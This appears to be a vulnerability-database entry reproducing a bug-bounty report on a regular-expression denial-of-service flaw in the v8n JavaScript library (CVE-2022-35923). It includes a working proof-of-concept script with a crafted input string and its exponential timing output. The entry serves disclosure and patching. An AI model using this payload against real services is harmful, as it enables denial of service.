Lucene search
Vovikhangcdv2D92F644-593B-43B4-BFD1-C8042AC60609HistoryJun 29, 2022 - 6:40 a.m.
Inefficient Regular Expression Complexity potentially leads to Denial of Service in
2022-06-2906:40:14
vovikhangcdv
www.huntr.dev
13
inefficient regular expression
denial of service
exploitable code
performance issue
dos attack
bug bounty
regex complexity
EPSS
0.001
Percentile
50.0%
Description
Inefficient regular expression complexity of lowercase() and uppercase() regex could lead to a denial of service attack. With a formed payload 'a' + 'a'.repeat(i) + 'A', only 32 characters payload could take 29443 ms time execution when testing lowercase(). The same issue happens with uppercase().
Proof of Concept
// PoC.js
const v8n = require('v8n')
for (var i = 1; i <= 1000; i++) {
var time = Date.now();
var attack_str = 'a' + 'a'.repeat(i) + 'A'
v8n().lowercase().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
Output
attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms
Related
osv
osv
v8n vulnerable to Inefficient Regular Expression Complexity
2022-10-07 07:33:44
CVE-2022-35923
2022-08-02 20:15:09
prion
prion
Design/Logic Flaw
2022-08-02 20:15:00
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2022-08-03 07:44:21
nvd
nvd
CVE-2022-35923
2022-08-02 20:15:09
cvelist
cvelist
CVE-2022-35923 Inefficient Regular Expression Complexity in v8n
2022-08-02 20:10:11
github
github
v8n vulnerable to Inefficient Regular Expression Complexity
2022-10-07 07:33:44
cve
cve
CVE-2022-35923
2022-08-02 20:15:09